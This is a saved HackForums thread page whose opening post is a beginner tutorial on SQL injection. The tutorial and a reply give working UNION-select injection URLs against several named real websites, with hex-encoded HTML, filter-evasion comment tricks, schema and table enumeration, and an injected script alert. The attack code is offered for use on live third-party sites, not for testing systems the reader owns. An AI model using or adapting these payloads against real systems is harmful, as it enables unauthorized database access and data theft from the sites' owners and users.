<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- saved from url=(0052)http://www.hackforums.net/showthread.php?tid=2798495 -->
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>SQLi tip for newbies - adding HTML commands - Page 1</title>
<!-- start: headerinclude -->
<meta name="description" content="SQL Injection Attacks-SQLi tip for newbies - adding HTML commands">
<meta name="keywords" content="hacking,hackers,hacks,hack,exploits,facebook,twitter,griefing,forum,forums,keylogger,games,minecraft,security,coding,virus,worm,computer,bitcoin,hosting">
<link rel="canonical" href="./SQLi tip for newbies - adding HTML commands - Page 1_files/SQLi tip for newbies - adding HTML commands - Page 1.htm">
<meta http-equiv="X-UA-Compatible" content="IE=8">
<link rel="alternate" type="application/rss+xml" title="Latest Threads (RSS 2.0)" href="http://www.hackforums.net/syndication.php">
<link rel="alternate" type="application/atom+xml" title="Latest Threads (Atom 1.0)" href="http://www.hackforums.net/syndication.php?type=atom1.0">
<link rel="image_src" href="http://x.hackforums.net/images/avatars/Hardstyle2.png">
<link rel="apple-touch-icon" href="http://x.hackforums.net/apple-touch-icon-precomposed.png">

<meta http-equiv="Content-Script-Type" content="text/javascript">
<script type="text/javascript" src="./SQLi tip for newbies - adding HTML commands - Page 1_files/prototype.js"></script>
<script type="text/javascript" src="./SQLi tip for newbies - adding HTML commands - Page 1_files/general.js"></script>
<script type="text/javascript" src="./SQLi tip for newbies - adding HTML commands - Page 1_files/popup_menu.js"></script>

<link type="text/css" rel="stylesheet" href="./SQLi tip for newbies - adding HTML commands - Page 1_files/global.css">
<link type="text/css" rel="stylesheet" href="./SQLi tip for newbies - adding HTML commands - Page 1_files/star_ratings.css">
<link type="text/css" rel="stylesheet" href="./SQLi tip for newbies - adding HTML commands - Page 1_files/showthread.css">

<script type="text/javascript">
<!--
	var cookieDomain = ".hackforums.net";
	var cookiePath = "/";
	var cookiePrefix = "";
	var deleteevent_confirm = "Are you sure you want to delete this event?";
	var removeattach_confirm = "Are you sure you want to remove the selected attachment from this post?";
	var loading_text = 'Loading. <br />Please Wait..';
	var saving_changes = 'Saving changes..';
	var use_xmlhttprequest = "1";
	var my_post_key = "111c6251d6ef052e4fa64dde874f3290";
	var imagepath = "http://x.hackforums.net/images/modern_bl";
// -->
</script>

<script type="text/javascript" src="./SQLi tip for newbies - adding HTML commands - Page 1_files/tabcontent.js">
/***********************************************
* Tab Content script v2.2- copyright Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Drive at http://www.dynamicdrive.com/ for full source code
***********************************************/
</script>
<!-- end: headerinclude -->
<script type="text/javascript">
<!--
	var quickdelete_confirm = "Are you sure you want to delete this post?";
// -->
</script>
<script type="text/javascript" src="./SQLi tip for newbies - adding HTML commands - Page 1_files/thread.js"></script>
</head>
<body>
	<!-- start: header -->
<div id="container">
<div class="largetext">Welcome to HackForums.net<span class="smalltext float_right"><strong>Current time:</strong> 03-19-2014, 12:05 AM</span></div>
		<a name="top" id="top"></a>
		<div id="header">

			<div class="logo"><a href="http://www.hackforums.net/"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/logo_bl.gif" alt="Hack Forums" title="Hack Forums"></a></div>

			<div class="menu">
				<ul>
					<li><a href="http://www.hackforums.net/" class="navButton">Home</a></li> 
					<li><a href="http://www.hackforums.net/upgrade.php" class="navButton">Upgrade</a></li> 
					<li><a href="http://www.hackforums.net/search.php" class="navButton">Search</a></li> 
					<li><a href="http://www.hackforums.net/memberlist.php" class="navButton">Members</a></li> 
					<li><a href="http://www.hackforums.net/extras.php" class="navButton">Extras</a></li> 
					<li><a href="http://www.hackforums.net/misc.php?action=help" class="navButton">Help</a></li> 
					<li><a href="http://twitter.com/hackforumsnet" class="navButton">Follow</a></li>
					<li><a href="http://www.hackforums.net/contact.php" class="navButton">Contact</a></li>
				</ul>
			</div>
			<hr class="hidden">
			<div id="panel">
				<!-- start: header_welcomeblock_member -->
<strong>Welcome back, <a href="http://www.hackforums.net/member.php?action=profile&uid=2225297">aravindor</a></strong>. You last visited: Yesterday, 11:01 PM (<a href="http://www.hackforums.net/usercp.php"><strong>User CP</strong></a> — <a href="http://www.hackforums.net/member.php?action=logout&logoutkey=37ba38b62b75d37d864c8fcd36a8893e" onclick="return confirm(&#39;Are you sure you want to logout?&#39;);">Log Out</a>)<br>
				<span class="links">
					<a href="http://www.hackforums.net/showthread.php?tid=2798495#" onclick="MyBB.popupWindow(&#39;http://www.hackforums.net/misc.php?action=buddypopup&#39;, &#39;buddyList&#39;, 350, 350);">Open Buddy List</a>
				</span>
				<a href="http://www.hackforums.net/search.php?action=getnew">View New Posts</a> | <a href="http://www.hackforums.net/search.php?action=finduserthreads&uid=2225297">Your Threads</a> | <a href="http://www.hackforums.net/search.php?action=finduser&uid=2225297">Your Posts</a> | <a href="http://www.hackforums.net/private.php">Private Messages</a> (Unread 1, Total 1)
<!-- end: header_welcomeblock_member -->
			</div>
		</div>
<!--//
 <br />

<div class="pm_alert"> &nbsp;</div>
-->


		<hr class="hidden">
		<br class="clear">
		<div id="content">
			
			<!-- start: global_pm_alert -->
<div class="pm_alert" id="pm_notice">
	<div class="float_right"><a href="http://www.hackforums.net/private.php?action=dismiss_notice&my_post_key=111c6251d6ef052e4fa64dde874f3290" title="Dismiss this notice" onclick="return MyBB.dismissPMNotice()"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/dismiss_notice.gif" alt="Dismiss this notice" title="[x]"></a></div>
	<div><strong>You have one unread private message</strong> from <a href="http://www.hackforums.net/member.php?action=profile&uid=1">Omniscient</a> titled <a href="http://www.hackforums.net/private.php?action=read&pmid=51796315" style="font-weight: bold;">Welcome aravindor to Hack Forums</a></div>
</div>
<br>
<!-- end: global_pm_alert -->
			
			
                                          
			<!-- start: nav -->

<div class="navigation">
<!-- start: nav_bit -->
<a href="http://www.hackforums.net/index.php">Hack Forums</a><!-- start: nav_sep -->
 / 
<!-- end: nav_sep -->
<!-- end: nav_bit --><!-- start: nav_bit -->
<a href="http://www.hackforums.net/forumdisplay.php?fid=45">Hacks, Exploits, and Various Discussions</a><!-- start: nav_sep -->
 / 
<!-- end: nav_sep -->
<!-- end: nav_bit --><!-- start: nav_bit -->
<a href="http://www.hackforums.net/forumdisplay.php?fid=43">Website and Forum Hacking</a><!-- start: nav_sep -->
 / 
<!-- end: nav_sep -->
<!-- end: nav_bit --><!-- start: nav_bit -->
<a href="http://www.hackforums.net/forumdisplay.php?fid=103">SQL Injection Attacks</a>
<!-- end: nav_bit --><!-- start: nav_sep_active -->
 / 
<!-- end: nav_sep_active --><!-- start: nav_bit_active -->
<span class="active">SQLi tip for newbies - adding HTML commands</span>
<!-- end: nav_bit_active -->
</div>
<!-- end: nav -->
<br>

<div class="quick_keys">
<div class="headerad" align="center"><a href="http://goo.gl/JiPABE" title="magic key"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/magickey.gif" alt="magic key"></a><!--// Till March 27, 2014 --><br><br></div><!-- end: header -->
	
	<div class="float_left">
		<!-- start: multipage -->
<div class="pagination">
<span class="pages">Pages (6):</span>
<!-- start: multipage_page_current -->
 <span class="pagination_current">1</span>
<!-- end: multipage_page_current --><!-- start: multipage_page -->
<a href="http://www.hackforums.net/showthread.php?tid=2798495&page=2" class="pagination_page">2</a>
<!-- end: multipage_page --><!-- start: multipage_page -->
<a href="http://www.hackforums.net/showthread.php?tid=2798495&page=3" class="pagination_page">3</a>
<!-- end: multipage_page --><!-- start: multipage_page -->
<a href="http://www.hackforums.net/showthread.php?tid=2798495&page=4" class="pagination_page">4</a>
<!-- end: multipage_page --><!-- start: multipage_page -->
<a href="http://www.hackforums.net/showthread.php?tid=2798495&page=5" class="pagination_page">5</a>
<!-- end: multipage_page --><!-- start: multipage_end -->
 <a href="http://www.hackforums.net/showthread.php?tid=2798495&page=6" class="pagination_last">6</a>
<!-- end: multipage_end --><!-- start: multipage_nextpage -->
<a href="http://www.hackforums.net/showthread.php?tid=2798495&page=2" class="pagination_next">Next »</a>
<!-- end: multipage_nextpage -->
</div>
<!-- end: multipage -->
	</div>
	<div class="float_right" style="padding: 5px 2px;">
		<!-- start: showthread_newreply -->
<a href="http://www.hackforums.net/newreply.php?tid=2798495" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a>
<!-- end: showthread_newreply -->
	</div>
	<!-- start: showthread_ratethread -->
<div style="margin-top: 6px; padding-right: 10px;" class="float_right">
		<script type="text/javascript" src="./SQLi tip for newbies - adding HTML commands - Page 1_files/rating.js"></script>
		<div id="success_rating_2798495" style="float: left; padding-top: 2px; padding-right: 10px;">&nbsp;</div>
		<strong style="float: left; padding-right: 10px;">Thread Rating:</strong>
		<div class="inline_rating">
			<ul class="star_rating star_rating_notrated" id="rating_thread_2798495">
				<li style="width: 0%" class="current_rating" id="current_rating_2798495">0 Votes - 0 Average</li>
				<li><a class="one_star" title="1 star out of 5" href="http://www.hackforums.net/ratethread.php?tid=2798495&rating=1&my_post_key=111c6251d6ef052e4fa64dde874f3290" rel="nofollow">1</a></li>
				<li><a class="two_stars" title="2 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=2798495&rating=2&my_post_key=111c6251d6ef052e4fa64dde874f3290" rel="nofollow">2</a></li>
				<li><a class="three_stars" title="3 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=2798495&rating=3&my_post_key=111c6251d6ef052e4fa64dde874f3290" rel="nofollow">3</a></li>
				<li><a class="four_stars" title="4 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=2798495&rating=4&my_post_key=111c6251d6ef052e4fa64dde874f3290" rel="nofollow">4</a></li>
				<li><a class="five_stars" title="5 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=2798495&rating=5&my_post_key=111c6251d6ef052e4fa64dde874f3290" rel="nofollow">5</a></li>
			</ul>
		</div>
</div>
<!-- end: showthread_ratethread -->
	<table border="0" cellspacing="1" cellpadding="4" class="tborder" style="clear: both; border-bottom-width: 0;">
		<tbody><tr>
			<td class="thead" colspan="2">
 <div class="float_right">
<a href="http://www.hackforums.net/showthread.php?tid=2798495#top" id="thread_options_2798495" class="smalltext"><strong>Thread Options</strong></a>
<div id="thread_options_2798495_popup" class="popup_menu" style="display: none;">
<div class="popup_item_container thread_options"><a href="http://www.hackforums.net/printthread.php?tid=2798495" class="popup_item">View a Printable Version</a></div>
<div class="popup_item_container thread_options"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&tid=2798495&my_post_key=111c6251d6ef052e4fa64dde874f3290" class="popup_item" rel="nofollow">Subscribe to this thread</a></div>
</div>


</div>
<script type="text/javascript">
<!--
    new PopupMenu("thread_options_2798495");
// -->
</script>

				<div>					<strong>SQLi tip for newbies - adding HTML commands</strong>
				</div>
			</td>
		</tr>
		
	</tbody></table>
	<div id="posts">
		<!-- start: postbit -->

<a name="pid25731800" id="pid25731800"></a>
<table border="0" cellspacing="1" cellpadding="4" class="tborder" style="border-top-width: 0; " id="post_25731800">
	<tbody>
		<tr>
			<td class="tcat">
				<div class="float_left smalltext">
					08-21-2012, 11:00 AM <span id="edited_by_25731800"><!-- start: postbit_editedby -->
<span class="smalltext">(This post was last modified: 08-21-2012 11:11 AM by <a href="http://www.hackforums.net/member.php?action=profile&uid=949543">ajkaro</a>.)</span>


<!-- end: postbit_editedby --></span>
				</div>
				<!-- start: postbit_posturl -->
<div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2798495&pid=25731800#pid25731800">#1</a></strong></span></div>
<!-- end: postbit_posturl -->
			</td>
		</tr>

		<tr>
			<td class="trow1 ">
				<table cellspacing="0" cellpadding="0" border="0" style="width: 100%;">
					<tbody><tr>
						<td class="post_avatar" width="1" style="padding-right: 10px;">
							<!-- start: postbit_avatar -->
<a href="http://www.hackforums.net/member.php?action=profile&uid=949543"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/avatar_949543.png" alt="" width="100" height="100"></a>
<!-- end: postbit_avatar -->
						</td>
						<td class="post_author">
							<strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&uid=949543"><span class="group29">ajkaro</span></a></span></strong> <!-- start: postbit_offline -->
<img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/buddy_offline.gif" title="Offline" alt="Offline">
<!-- end: postbit_offline --><br>
							<span class="smalltext">
								Ub3r Member<br>
								<span class="userstars"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/starub3r2.png" border="0" alt="*"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/starub3r2.png" border="0" alt="*"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/starub3r2.png" border="0" alt="*"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/starub3r2.png" border="0" alt="*"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/starub3r2.png" border="0" alt="*"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/starub3r2.png" border="0" alt="*"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/starub3r2.png" border="0" alt="*"><br></span>
								<!-- start: postbit_groupimage -->
<img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r">
<!-- end: postbit_groupimage -->
							</span>
						</td>
						<td class="smalltext post_author_info" width="165">
							Prestige: 136<br><!-- start: postbit_author_user -->

	Posts: 2,153<br>
	Joined: Aug 2011
	<!-- start: postbit_reputation -->
<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">213</strong></a>
<!-- end: postbit_reputation -->
<!-- end: postbit_author_user --><br><span style="white-space:normal; width: 100%;"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span>
						</td>
					</tr>
				</tbody></table>
			</td>
		</tr>

		<tr>
			<td class="trow2 post_content ">


				<div class="post_body" id="pid_25731800">
					Sometimes we want to add different HTML commands to our SQLi command: <br>
<br>
1) it can be just for fun (<span style="color: #00BFFF;">example 1</span>), <br>
2) for making result of our SQLi command easier to read (<span style="color: #00BFFF;">example 2</span>) <br>
3) or is a must when vulnerable columns are not visible and must we make them visible with changes of web site's HTML code (<span style="color: #00BFFF;">example 3</span>)<br>
<br>
<span style="font-weight: bold;"><span style="color: #00BFFF;"><span style="font-size: medium;">Example 1</span></span></span><br>
This example is related to SQLi challenge<br>
<a href="http://www.hackforums.net/showthread.php?tid=2789883" target="_blank">http://www.hackforums.net/showthread.php?tid=2789883</a><br>
<br>
In this example we add HTML command <span style="font-weight: bold;"><span style="color: #32CD32;">&lt;font color=red&gt;</span></span> to our SQli command. <br>
<div class="codeblock">
<div class="title">Code:<br>
</div><div class="body" dir="ltr"><code>http://www.simkits.com/product.php?prodid=879) and 0 UNION SELECT 1,concat(&lt;font color=red&gt;,version()),3,4,5,6,7,8,9-- -</code></div></div>
<br>
We use function concat to join html color command with version(). <span style="color: #FF4500;">But first we must change our HTML code to hex value.</span> Easiest way to do this is using Firefox's addon Hackbar. There we simple mark the desired text (like &lt;font color=red&gt; in our case) and select Hackbar's option "Encoding - HEX encoding - String to 00ff00ff".<br>
<br>
We MUST add prefix 0x to that converted value. So 0x3c666f6e7420636f6c6f723d7265643e is:<br>
<br>
<span style="color: #32CD32;">0x</span> --&gt; prefix for value in hex<br>
<span style="color: #32CD32;">3c666f6e7420636f6c6f723d7265643e</span> --&gt; &lt;font color=red&gt; in hex<br>
<br>
Final command will be:<br>
<div class="codeblock">
<div class="title">Code:<br>
</div><div class="body" dir="ltr"><code>http://www.simkits.com/product.php?prodid=879) and 0 UNION SELECT 1, concat(0x3c666f6e7420636f6c6f723d7265643e,version()),3,4,5,6,7,8,9-- -</code></div></div>
<br>
<span style="font-weight: bold;"><span style="color: #00BFFF;"><span style="font-size: medium;">Example 2</span></span></span><br>
When we search for table names or column names result can be hard to read, because there are to many names. Let see result of this SQLi command on picture.<br>
<div class="codeblock">
<div class="title">Code:<br>
</div><div class="body" dir="ltr"><code>http://www.hcu.edu.lb/content.php?type=2&amp;ref=primary&amp;pid=1&amp;cat_id=4&amp;det_id=51 and 0+union select 1,2,3,convert(group_concat(table_name) using ascii),5,6,7,8,9,10,11,12 from information_schema.tables where table_schema=database()-- -</code></div></div>
<img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/1d0ae96bb0166b775114b594d226923d.jpg" border="0" alt="[Image: 1d0ae96bb0166b775114b594d226923d.jpg]"><br>
<br>
If we add simple <span style="color: #32CD32;">&lt;br&gt;</span> - HTML command to break the line to our injection code it can look better - see picture bellow.<br>
<br>
SQLi command with added &lt;br&gt; in hex:<br>
<div class="codeblock">
<div class="title">Code:<br>
</div><div class="body" dir="ltr"><code>http://www.hcu.edu.lb/content.php?type=2&amp;ref=primary&amp;pid=1&amp;cat_id=4&amp;det_id=51 and 0+union select 1,2,3,convert(group_concat(table_name,0x3c62723e) using ascii),5,6,7,8,9,10,11,12 from information_schema.tables where table_schema=database()-- -</code></div></div>
<img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/SnXQS.jpg" border="0" alt="[Image: SnXQS.jpg]"><br>
<br>
where 0x3c62723e is:<br>
<span style="color: #32CD32;">0x</span> --&gt; prefix for value in hex<br>
<span style="color: #32CD32;">3c62723e</span> --&gt; &lt;br&gt; in hex<br>
<br>
<span style="font-weight: bold;"><span style="color: #00BFFF;"><span style="font-size: medium;">Example 3</span></span></span><br>
We have this command:<br>
<div class="codeblock">
<div class="title">Code:<br>
</div><div class="body" dir="ltr"><code>http://nbnewsxpress.com/news.php?id=-28))+/*!50000%55nIoN*/ /*!50000%53eLeCt aLl*/+1111,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23<br>
-- -</code></div></div>
<br>
Using this command we can't see version() on screen.<br>
<img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/a0be80d4c601de62b7b751d855e93b1b.jpg" border="0" alt="[Image: a0be80d4c601de62b7b751d855e93b1b.jpg]"><br>
<br>
In this case if we want to see vulnerable columns and result of our SQLi we must change HTML code. We can do this with adding <span style="color: #32CD32;">"&gt;</span> before version() and <span style="color: #32CD32;">&lt;a href="</span> after it. In hex values of course. <br>
<br>
So the final working command is:<br>
<div class="codeblock">
<div class="title">Code:<br>
</div><div class="body" dir="ltr"><code>http://nbnewsxpress.com/news.php?id=-28))+/*!50000%55nIoN*/ /*!50000%53eLeCt aLl*/+concat(1111,0x223e,version(),0x3c6120687265663d22),2,3,4,5,6,7,8,9,10,11,12,13,​14,15,16,17,18,19,20,21,22,23-- -</code></div></div>
<img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/c87c7faac07de886444f0bdbd2a54ed4.jpg" border="0" alt="[Image: c87c7faac07de886444f0bdbd2a54ed4.jpg]"><br>
<br>
where 0x223e is:<br>
<span style="color: #32CD32;">0x</span> --&gt; prefix for value in hex<br>
<span style="color: #32CD32;">223e</span> --&gt; "&gt; in hex<br>
<br>
and<br>
<br>
where 0x3c6120687265663d22 is:<br>
<span style="color: #32CD32;">0x</span> --&gt; prefix for value in hex<br>
<span style="color: #32CD32;">3c6120687265663d22</span> --&gt; &lt;a href=" in hex<br>
<br>
In example 3 I only showed how to add HTML command to SQLi. Follow great tutorial from benzi for all other details about this technique. <span style="font-weight: bold;"><span style="color: #FFA500;">It is a must reading</span></span> :) You can find benzi's tutorial here:<br>
<a href="http://www.hackforums.net/showthread.php?tid=2646138" target="_blank">http://www.hackforums.net/showthread.php?tid=2646138</a><br>
<br>
Hope this tip helps someone... <img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/blackhat.gif" style="vertical-align: middle;" border="0" alt="Black Hat" title="Black Hat">
				</div>
				
				<!-- start: postbit_signature -->
<hr style="width: 20%;background: #000;">
<div style="overflow:hidden; max-height:200px;"><div style="text-align: center;"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/5d05c33f99f9be469b8e7145660bbe92.png" border="0" alt="[Image: 5d05c33f99f9be469b8e7145660bbe92.png]"><br>
<span style="color: #32CD32;"><span style="font-weight: bold;">my SQLi tutorials collection:</span></span><br>
<a href="http://www.hackforums.net/showthread.php?tid=3819819" target="_blank">http://www.hackforums.net/showthread.php?tid=3819819</a><br>
</div></div>
<!-- end: postbit_signature -->

				<div class="post_meta" id="post_meta_25731800">
				
				</div>
			</td>
		</tr>

		<tr>
			<td class="trow1 post_buttons ">
				<div class="author_buttons float_left">
					<!-- start: postbit_pm -->
<a href="http://www.hackforums.net/private.php?action=send&uid=949543" class="bitButton" rel="nofollow" title="Send this user a private message">PM</a>
<!-- end: postbit_pm --><!-- start: postbit_find -->
<a href="http://www.hackforums.net/search.php?action=finduser&uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a>
<!-- end: postbit_find -->
				</div>
				<div class="post_management_buttons float_right"><!-- start: postbit_quote -->
<a href="http://www.hackforums.net/newreply.php?tid=2798495&replyto=25731800" class="bitButton" rel="nofollow">Quote</a>
<!-- end: postbit_quote --><!-- start: postbit_report -->
<a href="javascript:Thread.reportPost(25731800);" class="bitButton" rel="nofollow" title="Report this post to a moderator">Report</a>
<!-- end: postbit_report -->
				</div>
			</td>
		</tr>
	</tbody>
</table>
<!-- end: postbit --><!-- start: postbit -->

<a name="pid25732808" id="pid25732808"></a>
<table border="0" cellspacing="1" cellpadding="4" class="tborder" style="margin-top: 5px; " id="post_25732808">
	<tbody>
		<tr>
			<td class="tcat">
				<div class="float_left smalltext">
					08-21-2012, 11:44 AM <span id="edited_by_25732808"><!-- start: postbit_editedby -->
<span class="smalltext">(This post was last modified: 08-21-2012 11:45 AM by <a href="http://www.hackforums.net/member.php?action=profile&uid=327525">rvltr</a>.)</span>


<!-- end: postbit_editedby --></span>
				</div>
				<!-- start: postbit_posturl -->
<div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2798495&pid=25732808#pid25732808">#2</a></strong></span></div>
<!-- end: postbit_posturl -->
			</td>
		</tr>

		<tr>
			<td class="trow1 ">
				<table cellspacing="0" cellpadding="0" border="0" style="width: 100%;">
					<tbody><tr>
						<td class="post_avatar" width="1" style="">
							
						</td>
						<td class="post_author">
							<strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&uid=327525"><span style="color:#383838">rvltr</span></a></span></strong> <!-- start: postbit_offline -->
<img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/buddy_offline.gif" title="Offline" alt="Offline">
<!-- end: postbit_offline --><br>
							<span class="smalltext">
								Closed Account<br>
								<span class="userstars"></span>
								
							</span>
						</td>
						<td class="smalltext post_author_info" width="165">
							Prestige: 27<br><!-- start: postbit_author_user -->

	Posts: 558<br>
	Joined: May 2010
	<!-- start: postbit_reputation -->
<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=327525"><strong class="reputation_positive">30</strong></a>
<!-- end: postbit_reputation -->
<!-- end: postbit_author_user --><br>
						</td>
					</tr>
				</tbody></table>
			</td>
		</tr>

		<tr>
			<td class="trow2 post_content ">


				<div class="post_body" id="pid_25732808">
					excellent tutorial. this inspires some creativity for sure<br>
<br>
one that is kinda fun is combining this with some js so you can have the data displayed for you in a nice alert box. i think ill call it XSSQLi haha<br>
<br>
<div class="codeblock">
<div class="title">Code:<br>
</div><div class="body" dir="ltr"><code>http://www.jamfest.com/Competitions/Event.php?ID=113'+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1​8,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,(SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema&gt;=@) AND (@)IN (@:=CONCAT(@,0x3C7363726970743E616C6572742827,' [ ',table_schema,' ] &gt;',table_name,' &gt; ',column_name,0x27293B3C2F7363726970743E))))x),34,35,36,37,38,39,40,41,42,43,44,​45,46,47,48,49,50,51,52,53,54,55,56,57,58,59--+--</code></div></div>
<br>
<img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/hX0Rl.png" border="0" alt="[Image: hX0Rl.png]">
				</div>
				
				

				<div class="post_meta" id="post_meta_25732808">
				
				</div>
			</td>
		</tr>

		<tr>
			<td class="trow1 post_buttons ">
				<div class="author_buttons float_left">
					<!-- start: postbit_find -->
<a href="http://www.hackforums.net/search.php?action=finduser&uid=327525" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a>
<!-- end: postbit_find -->
				</div>
				<div class="post_management_buttons float_right"><!-- start: postbit_quote -->
<a href="http://www.hackforums.net/newreply.php?tid=2798495&replyto=25732808" class="bitButton" rel="nofollow">Quote</a>
<!-- end: postbit_quote --><!-- start: postbit_report -->
<a href="javascript:Thread.reportPost(25732808);" class="bitButton" rel="nofollow" title="Report this post to a moderator">Report</a>
<!-- end: postbit_report -->
				</div>
			</td>
		</tr>
	</tbody>
</table>
<!-- end: postbit --><!-- start: postbit -->

<a name="pid25733563" id="pid25733563"></a>
<table border="0" cellspacing="1" cellpadding="4" class="tborder" style="margin-top: 5px; " id="post_25733563">
	<tbody>
		<tr>
			<td class="tcat">
				<div class="float_left smalltext">
					08-21-2012, 12:12 PM <span id="edited_by_25733563"><!-- start: postbit_editedby -->
<span class="smalltext">(This post was last modified: 08-21-2012 12:13 PM by <a href="http://www.hackforums.net/member.php?action=profile&uid=949543">ajkaro</a>.)</span>


<!-- end: postbit_editedby --></span>
				</div>
				<!-- start: postbit_posturl -->
<div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2798495&pid=25733563#pid25733563">#3</a></strong></span></div>
<!-- end: postbit_posturl -->
			</td>
		</tr>

		<tr>
			<td class="trow1 ">
				<table cellspacing="0" cellpadding="0" border="0" style="width: 100%;">
					<tbody><tr>
						<td class="post_avatar" width="1" style="padding-right: 10px;">
							<!-- start: postbit_avatar -->
<a href="http://www.hackforums.net/member.php?action=profile&uid=949543"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/avatar_949543.png" alt="" width="100" height="100"></a>
<!-- end: postbit_avatar -->
						</td>
						<td class="post_author">
							<strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&uid=949543"><span class="group29">ajkaro</span></a></span></strong> <!-- start: postbit_offline -->
<img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/buddy_offline.gif" title="Offline" alt="Offline">
<!-- end: postbit_offline --><br>
							<span class="smalltext">
								Ub3r Member<br>
								<span class="userstars"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/starub3r2.png" border="0" alt="*"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/starub3r2.png" border="0" alt="*"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/starub3r2.png" border="0" alt="*"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/starub3r2.png" border="0" alt="*"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/starub3r2.png" border="0" alt="*"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/starub3r2.png" border="0" alt="*"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/starub3r2.png" border="0" alt="*"><br></span>
								<!-- start: postbit_groupimage -->
<img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r">
<!-- end: postbit_groupimage -->
							</span>
						</td>
						<td class="smalltext post_author_info" width="165">
							Prestige: 136<br><!-- start: postbit_author_user -->

	Posts: 2,153<br>
	Joined: Aug 2011
	<!-- start: postbit_reputation -->
<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">213</strong></a>
<!-- end: postbit_reputation -->
<!-- end: postbit_author_user --><br><span style="white-space:normal; width: 100%;"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span>
						</td>
					</tr>
				</tbody></table>
			</td>
		</tr>

		<tr>
			<td class="trow2 post_content ">


				<div class="post_body" id="pid_25733563">
					<blockquote><cite><span> (08-21-2012 11:44 AM)</span>rvltr Wrote: <a href="http://www.hackforums.net/showthread.php?pid=25732808#pid25732808" class="quick_jump">►</a></cite>excellent tutorial. this inspires some creativity for sure<br>
<br>
one that is kinda fun is combining this with some js so you can have the data displayed for you in a nice alert box. i think ill call it XSSQLi haha<br>
<br>
...</blockquote>
<br>
You were really creativ <img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/oui.gif" style="vertical-align: middle;" border="0" alt="Oui" title="Oui"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/victoire.gif" style="vertical-align: middle;" border="0" alt="Victoire" title="Victoire"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/pirate.gif" style="vertical-align: middle;" border="0" alt="Pirate" title="Pirate"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/thumbsup.gif" style="vertical-align: middle;" border="0" alt="Thumbsup" title="Thumbsup">
				</div>
				
				<!-- start: postbit_signature -->
<hr style="width: 20%;background: #000;">
<div style="overflow:hidden; max-height:200px;"><div style="text-align: center;"><img src="./SQLi tip for newbies - adding HTML commands - Page 1_files/5d05c33f99f9be469b8e7145660bbe92.png" border="0" alt="[Image: 5d05c33f99f9be469b8e7145660bbe92.png]"><br>
<span style="color: #32CD32;"><span style="font-weight: bold;">my SQLi tutorials collection:</span></span><br>
